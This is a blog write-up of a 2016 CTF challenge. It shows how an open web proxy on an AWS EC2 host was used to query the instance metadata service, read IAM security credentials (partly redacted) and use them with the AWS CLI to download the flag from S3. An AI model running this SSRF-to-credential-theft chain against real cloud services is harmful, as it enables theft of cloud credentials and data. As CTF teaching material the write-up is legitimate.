StartCon 2016 CTF - AWS EC2 / S3 Writeup

-
Thanks to Freelancer.com & the sponsors behind the inaugural StartCon Capture the Flag competition.

The Farming Simulator 2016 (CTF chapter of the Platypus community) teams took out 1st, 2nd, 3rd & (5th?) places. Or as we'd rather term it, we performed a successful DoS of prizes to other teams. A large percentage of the winnings will be used responsibly on shit like a giant inflatable platypus.

Also a big thank you to Michael Foley, who I believe ran his first CTF this weekend. From running Platypus Con's CTF, I know how hard this shit is, so good work man. I had a lot of fun. Keep 'em coming.

Credit for the "thought leadership" in the writeup goes to @infosec_au. If you'd like to say thank you, maybe shoot his charity, Hackers Helping Hackers, a few dollars, or dump any spare conference tickets on them to forward to students or fellow hackers in need.

The two flags I grabbed for my team (to come second by a comfortable margin ;)) were:
  • A GitLab arbitrary file disclosure vulnerability
    • Doesn't really need a write-up thanks to a fantastic HackerOne report here
    • This was a big lesson- not all vulnerabilities have high profile CVEs. Some just sit in HackerOne reports... :)
  • The "open proxy" on EC2
I'll be writing up the latter. Apologies for the lack of screenshots, URLs, code, etc. Looks like most of it has been taken down since the end of the CTF. I'll get better at the write-ups as I start to do more.

Preamble

Let me start by saying I love how this challenge was put together. It's simple, yet stumped quite a lot of people (probably through its sheer simplicity). To be fair, it requires knowledge of the Amazon Web Services (AWS) platform, which not an awful lot of hackers have.

The only thing I can say here is, as a security professional, you need to be where your "customers" are- as much as I love a good ROP chain, sometimes the best hacks, aren't.

The Challenge

We're provided with a web service, which appears to run some sort of web proxy. It's accessed in this kind of form:
http://1.1.1.1/?input=https://www.google.com

Where the input paramerter (in this case Google) is the page we want to go to.
We're also told the location of the flag is at:
https://s3-ap-southeast-2.amazonaws.com/startcon-ctf/11/flag.txt

Cool, so we just grab the flag through the proxy?
http://1.1.1.1/?input=https://s3-ap-southeast-2.amazonaws.com/startcon-ctf/11/flag.txt 



Nope. Ok, what about accessing the bucket through the hostname?
http://1.1.1.1/?input=https://startcon-ctf.s3.amazonaws.com/11/flag.txt

 

Nope. Okay, is it a:
  • File stored on the local server? Nope.
  • What about on itself? like 127.0.0.1 or localhost? Nope.
  • Some vuln with the input field? Fuzzed and nope.
So wtf is it? Well, let's do some recon.

Part I: The AWS EC2 Information Disclosure API

A not-too-well-known gem of the EC2 platform is this guy:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

The nice thing about having a mate who happens to be a core developer on a project like Flynn is that you learn about this shit over the dinner table. It's a local network metadata API which will return information about the host you're "on," designed to be leveraged by automation tools which allow host base images to be stateless.

So lets try that.
http://1.1.1.1/?input=http://169.254.169.254/latest/meta-data/

ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
iam
instance-action
instance-id
instance-type
kernel-id
local-hostname
local-ipv4
mac
network/
placement/
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/

Nice.
http://1.1.1.1/?input=http://169.254.169.254/latest/meta-data/iam/security-credentials/ctf-startcon-challenge11

{ "Code" : "Success", "LastUpdated" : "2016-11-27T03:14:23Z", "Type" : "AWS-HMAC", "AccessKeyId" : "ASIAIW2CALQDG2IEWNVQ", "SecretAccessKey" : "Uv7g55nbslN3AiigVSF0I4g4Tz18iT3fVZinA/gT", "Token" : "FQoDYJKFDSF//////////wEaDGL2HzBdaajmZblahblahblahloadsoftokenyougetthepoint", "Expiration" : "2016-11-27T09:29:45Z" }

Double Nice.

Without going into more detail here, you can quite quickly see how this meta-data API is useful. There's also a user-data API which typically gets used by developers and devops to have stateless images. You can typically find keys, runtime variables, sometimes even entire scripts in here.

Part II: Capture the Swag

From here it's pretty straight forward to steal the flag.

bash-4.4$ export AWS_ACCESS_KEY_ID=ASIAIW2CALQDG2IEWNVQ
bash-4.4$ export AWS_SECRET_ACCESS_KEY=Uv7g55nbslN3AiigVSF0I4g4Tz18iT3fVZinA/gT
bash-4.4$ export AWS_SECURITY_TOKEN=FQoDYJDSF//////////wEaDGL2Zblahblahblahloadsoftokenyougetthepoint
bash-4.4$ aws s3 cp s3://startcon-ctf/11/flag.txt .
download: s3://startcon-ctf/11/flag.txt to ./flag.txt
bash-4.4$ cat flag.txt
Flag{SimpleStorageService564}


If you enjoyed this, recommend you check out Dagrz's aws_pwn repo. Has some great resources and tooling for pwning in AWS.
Happy Hunting.

Comments

Post a Comment

Popular posts from this blog

2020 Hack-A-Sat DEFCON Space Security Challenge CTF Qualifiers 2020 - Part 1

-
Image
Preface This year the US Air Force teamed up with DoD's Digital Service and DEFCON's Aerospace village to build a CTF - the first of it's kind - to hack satellites. I joined with some colleagues and their CTF team to get our numbers around half a dozen. We missed the top ten by ~50 points, which was disappointing, but shows the quality of the teams we were up against and that the tournament attracted. Since joining a Bay Area tech company, I haven't found much time or mental space for CTFs or bug bounties. But aerospace has a special place in my heart, and with numerous commercial launch companies massively driving down the costs to get satellites up, understanding the frameworks, communication protocols, physics, tools, history etc. is going to be super important. Before I get to the goods, a hat tip to the USAF & DoD for getting behind this. Satellites are going to become increasingly important in our day-to-day lives, and investing in bringing the security commun
Read more

Man-in-the-middling SSL / TLS on Windows

-
"Is there a lock in the URL bar?" Funny how the proliferation of commercial CA's led to this question to become the hallmark of Internet security circa 2001. I'll keep that rant for another day. Thumbs up to EFF and Mozilla for finally doing something about it . When debugging issues with network connections or reverse engineering products, you might find the need to take the gloves off and find out exactly what an application is doing on the wire. You'll need a man in the middle. ( instantcsi ) Providing the application you're targeting uses a web protocol, you'll be in with some luck- there are heaps of web debugging proxies and tools you can use on any platforms. If you have physical access to the network (i.e. a non-corporate environment), or you have a Linux machine on the network that IT security approve of- the conversation effectively ends here: Use MITMproxy . Unfortunately I don't have either physical access or a Linux machine o
Read more

2021 Hack-A-Sat DEFCON Space Security Challenge CTF Qualifiers Writeup - Linky

-
Image
Linky was an RF math problem, introducing the link-budget algorithm and getting contestants to calculate missing parameters for the operation of the radio link. Years have passed since our satellite was designed, and the Systems Engineers didn't do a great job with the documentation. Partial information was left behind in the user documentation and we don't know what power level we should configure the Telemetry transmitter to ensure we have 10 dB of Eb/No margin over the minimum required for BER (4.4 dB) . Upon connecting to the target port and presenting token, you're presented with a TUI of sorts: _ _ _ | | (_)_ __ | | ___ _ | | | | '_ \| |/ / | | | | |___| | | | | <| |_| | |_____|_|_| |_|_|\_\\__, | |___/ .-. (;;;) \_| \ _.--l--._ . \ | `. .` `.\ | .` `. .` `\ | .` `. / __ \.|.` __ \/ | ''--._ \V _.--'' | | _ (") _ |
Read more